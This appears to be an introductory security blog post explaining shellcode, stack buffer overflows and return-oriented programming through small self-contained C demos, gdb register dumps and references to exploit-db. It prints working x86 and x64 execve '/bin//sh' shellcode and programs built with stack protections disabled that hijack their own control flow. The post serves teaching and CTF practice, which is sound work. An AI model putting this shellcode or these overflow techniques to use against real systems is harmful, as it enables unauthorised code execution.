Introduction
In this post, I will simply introduce the shellcode, buffer overflow and return-oriented-programming.
Shellcode
Usually, shellcode refers to a short sequence of assembly code to generate a shell for attacker. We display the shellcode under X86 and X64 system respectively [1][2].
//gcc -fno-stack-protector -z execstack shellx86.c -o shellx86 -no-pie -m32 #include #include unsigned char code[] = "\x31\xc0\x99\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"; int main() { int (*ret)() = (int(*)())code; ret(); } //gcc -fno-stack-protector -z execstack shellx64.c -o shellx64 -no-pie #include #include unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\xb0\x3b\x0f\x05"; int main() { int (*ret)()=(int(*)()) code; ret(); }
To show how those two shellcodes work, we dump the memory of these two shellcodes and show the status of register.
For shellcode on X86 platform:
0x804a018 <code>: xor %eax,%eax 0x804a01a <code>: cltd 0x804a01b <code>: push %eax 0x804a01c <code>: push $0x68732f2f 0x804a021 <code>: push $0x6e69622f 0x804a026 <code>: mov %esp,%ebx 0x804a028 <code>: push %eax 0x804a029 <code>: push %ebx 0x804a02a <code>: mov %esp,%ecx 0x804a02c <code>: mov $0xb,%al 0x804a02e <code>: int $0x80 Breakpoint 2, 0x0804a02e in code () (gdb) p/x $eax $1 = 0xb (gdb) p/x $ebx $2 = 0xffffd2d0 (gdb) x/s $ebx 0xffffd2d0: "/bin//sh" (gdb) p/x $ecx $3 = 0xffffd2c8 (gdb) x/4wx $ecx 0xffffd2c8: 0xffffd2d0 0x00000000 0x6e69622f 0x68732f2f (gdb) p/x $edx $4 = 0x0
At 0x804a02e where we are about to call syscall, $eax is used to store the syscall number for execve, $ebx is used to store the buffer address of “/bin//sh”, $ecx is used to store the argument buffer, $edx is 0.
For shellcode on X64 platform:
0x601030 <code>: mul %esi 0x601032 <code>: push %rdx 0x601033 <code>: movabs $0x68732f2f6e69622f,%rbx 0x60103d <code>: push %rbx 0x60103e <code>: lea (%rsp),%rdi 0x601042 <code>: mov $0x3b,%al 0x601044 <code>: syscall Breakpoint 2, 0x0000000000601044 in code () (gdb) p/x $rax $1 = 0x3b (gdb) p/x $rdi $2 = 0x7fffffffe148 (gdb) x/s $rdi 0x7fffffffe148: "/bin//sh" (gdb) p/x $rsi $3 = 0x7fffffffe258 (gdb) x/2gx $rsi 0x7fffffffe258: 0x00007fffffffe53f 0x0000000000000000 (gdb) p/x $rdx $4 = 0x0
At 0x601044 where we are about to call syscall, $rax is used to store the syscall number for execve, $rdi is used to store the buffer address of “/bin//sh”, $esi is used to store the environment variable, $rdx is 0.
Stack buffer overflow
Stack buffer overflow is usually used to corrupt the return value stored in stack.
//gcc bof.c -o bof -no-pie -z execstack #include #include int main() { unsigned char victim[20]; unsigned char code[] = "\xf7\xe6\x52\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x48\x8d\x3c\x24\x48\x31\xf6\x48\x31\xd2\xb0\x3b\x0f\x05"; printf("executeable code at %p\n", code); char c1 = (unsigned long)(code) & 0xff; char c2 = ((unsigned long)(code) & 0xff00)>>8; char c3 = ((unsigned long)(code) & 0xff0000)>>16; char c4 = ((unsigned long)(code) & 0xff000000)>>24; char c5 = ((unsigned long)(code) & 0xff00000000)>>32; char c6 = ((unsigned long)(code) & 0xff0000000000)>>40; snprintf(victim, 80, "AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA%c%c%c%c%c%c%c%c%c", c1, c2, c3, c4, c5, c6, 0, 0 ); return 0; }
The sample code above gives on how buffer overflow vulnerability corrupts the return value in stack and executes the shellcode in the end. One thing to note that the shellcode used here is slightly different from the shellcode given in previous section.
Return Oriented Programming
Return Oriented Programming (ROP) is a technique in code reuse attack.
//gcc rop.c -o rop -no-pie #include #include #include #include #include #include int main() { int rv; unsigned long victim[1]; unsigned long *gadget = malloc(0x4000); printf("gadget address: %p", gadget); rv = mprotect((void*)(gadget)-0x10, 0x1000, PROT_READ | PROT_WRITE | PROT_EXEC); if(rv < 0) { perror("mprotect: "); } unsigned long base = (unsigned long)gadget; victim[5] = base; victim[6] = base + 0x1000; gadget[0] = 0xc35c; gadget[1] = 0xc35f; gadget[2] = 0xc35e; gadget[3] = 0xc35a; gadget[4] = 0xc358; gadget[5] = 0x050f; gadget[0x200] = base + 8; gadget[0x201] = base + 0x2000; //rdi gadget[0x202] = base + 0x10; gadget[0x203] = 0; //rsi gadget[0x204] = base + 0x18; gadget[0x205] = 0; //rdx gadget[0x206] = base + 0x20; gadget[0x207] = 0x3b; gadget[0x208] = base + 0x28; gadget[0x400] = 0x68732f2f6e69622f; return 0; }
To give a better understanding on how the ROP works above, I dump the memory layout at the time of syscall for explanation.
(gdb) p/x $rax $1 = 0x3b (gdb) p/x $rdi $2 = 0x604010 (gdb) x/s $rdi 0x604010: "/bin//sh" (gdb) p/x $rsi $3 = 0x0 (gdb) p/x $rdx $4 = 0x0 (gdb) x/10gx 0x603010 0x603010: 0x0000000000602018 0x0000000000604010 0x603020: 0x0000000000602020 0x0000000000000000 0x603030: 0x0000000000602028 0x0000000000000000 0x603040: 0x0000000000602030 0x000000000000003b 0x603050: 0x0000000000602038 0x0000000000000000 (gdb) x/2i 0x602010 0x602010: pop %rsp 0x602011: retq (gdb) x/2i 0x602018 0x602018: pop %rdi 0x602019: retq (gdb) x/2i 0x602020 0x602020: pop %rsi 0x602021: retq (gdb) x/2i 0x602028 0x602028: pop %rdx 0x602029: retq (gdb) x/2i 0x602030 0x602030: pop %rax 0x602031: retq (gdb) x/i 0x602038 => 0x602038: syscall
In the given sample code, we simplify the buffer overflow vulnerability by overwriting the return address to 0x602010 directly.
Gadget pop rsp; ret works as pivot gadget to change rsp to 0x603010. The memory layout at 0x603010 is the crafted to a fake stack for chaining rop gadget.
There are 6 rop gadgets in total. Gadget at 0x602010 works as a pivot gadget to change rsp. Gadgets at 0x602018, 0x602020, 0x602028, 0x602030 work as loading gadget to load value into desired register. Gadget at 0x602038 triggers syscall.
In reality, we need to find suitable gadgets in the target binary and available gadgets are not as simple and trivial as given in the sample code.
Conclusion
In this post, I give a simple introduction on shellcode, stack buffer overflow and ROP. Moreover, I show how those things can be combined together to pwn a shell in the end. In real CTF challenges those things are not simple as demonstrated here. Challenges may include alphanumeric shellcode or shadow stack or simple Control Flow Integrity to make things complicated.
Reference
[1] https://www.exploit-db.com/exploits/42428/
[2] https://www.exploit-db.com/exploits/38239/